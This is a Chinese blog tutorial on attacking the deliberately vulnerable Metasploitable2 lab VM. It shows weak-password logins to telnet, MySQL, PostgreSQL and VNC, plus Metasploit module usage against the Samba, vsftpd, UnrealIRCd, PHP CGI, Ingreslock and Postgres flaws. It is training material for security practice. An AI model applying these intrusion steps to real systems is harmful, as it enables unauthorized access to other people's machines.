Metasploitable2靶机学习

  • Post author:
  • Post category:其他




什么是Metasploitable2?

Metasploitable2 虚拟系统是一个特别制作的ubuntu操作系统,本身设计作为安全工具测试和演示常见漏洞攻击。



使用步骤

下载地址:https://sourceforge.net/projects/metasploitable/files/latest/download

默认用户名密码都为:msfadmin

下载下来后直接双击

在这里插入图片描述

在这里插入图片描述

网卡模式我默认为NAT模式(NAT模式与自己wifi同网段,使用kali时也要在同一网段可以进行ping通)。



靶机漏洞

在进行漏洞测试之前可以扫一下端口

在这里插入图片描述

靶机ip为192.168.126.148

kali的ip为192.168.126.130



1、弱口令漏洞



系统弱密码

telnet 192.168.126.148

账号密码都为msfadmin

在这里插入图片描述



Mysql弱密码

使用mysql -h 192.168.126.148 -u root 直接登录成功

在这里插入图片描述



PostgresQL弱密码

使用psql -h 192.168.126.147 -U postgres

密码:postgres 登录成功

在这里插入图片描述



VNC远程登录弱密码

使用vnciewer 192.168.126.148

密码password直接登录



2、Samba MS-RPC Shell命令注入漏洞

漏洞产生的原因:通过MS-RPC提供的未过滤的用户输入在调用定义的外部脚本时调用/bin/sh,在smb.conf中,导致允许远程命令执行。



1、在kali中启用msfconsole

在这里插入图片描述



2、搜索相对应的samba漏洞代码 search samba

在这里插入图片描述



3、使用exploit/multi/samba/usermap_script

use exploit/multi/samba/usermap_script

在这里插入图片描述



4、设置参数

set rhosts 192.168.126.148

在这里插入图片描述



5、执行命令,查看目录

run

ls

在这里插入图片描述



3、Vsftpd源码包含后门漏洞

漏洞产生原因:在特定版本的vsftpd服务器程序中,被人恶意植入代码,当用户名以“: )”结尾时,服务器就会在6200端口监听,并且能够执行任意代码



1、在kali中启用msfconsole

在这里插入图片描述



2、搜索关于Vsftpd相关的漏洞库

search vsftpd

在这里插入图片描述



3、使用exploit/unix/ftp/vsftpd_234_backdoor

use exploit/unix/ftp/vsftpd_234_backdoor

在这里插入图片描述



4、设置参数

set rhosts 192.168.126.148

在这里插入图片描述



5、执行命令

在这里插入图片描述



4、UnreallRCd后门漏洞

漏洞产生的原因:在2009年11月到2010年6月间分布于某些镜面站点的UnreallRCd,在DEBUG3_DOLOG_SYSTEM宏中包含外部引入的恶意代码,远程攻击者能够执行任意代码

以上第一步第二步不在进行截图



1、找到相对应的模块进行使用

在这里插入图片描述



2、设置相对应的参数

在这里插入图片描述



3、执行

在这里插入图片描述



5、PHP CGI 参数注入执行漏洞

漏洞介绍:GI脚本没有正确处理请求参数,导致源代码泄露,允许远程攻击者在请求参数中插入执行命令。



1、找到相对应的模块进行使用

在这里插入图片描述



2、设置相对应的参数

在这里插入图片描述



3、执行

在这里插入图片描述



6、Ingreslock后门漏洞

漏洞介绍:Ingreslock 后门程序监听在1524端口,连接到1524端口就可以直接获得root权限



1、执行telnet命令

在这里插入图片描述



2、执行直接成功登录查看权限

在这里插入图片描述



7、Postgres共享库代码任意执行

漏洞介绍:在一些默认的Linux安装的PostgreSQL,postgres服务账户可以写到/tmp目录,还有共享库,允许任意执行代码



1、找到相对应的模块进行使用

在这里插入图片描述



2、设置相对应的参数

在这里插入图片描述



3、执行

在这里插入图片描述



总结:该靶场还有一些其他的漏洞大家可以参考一下其他师傅编写的。



版权声明:本文为m0_46371267原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。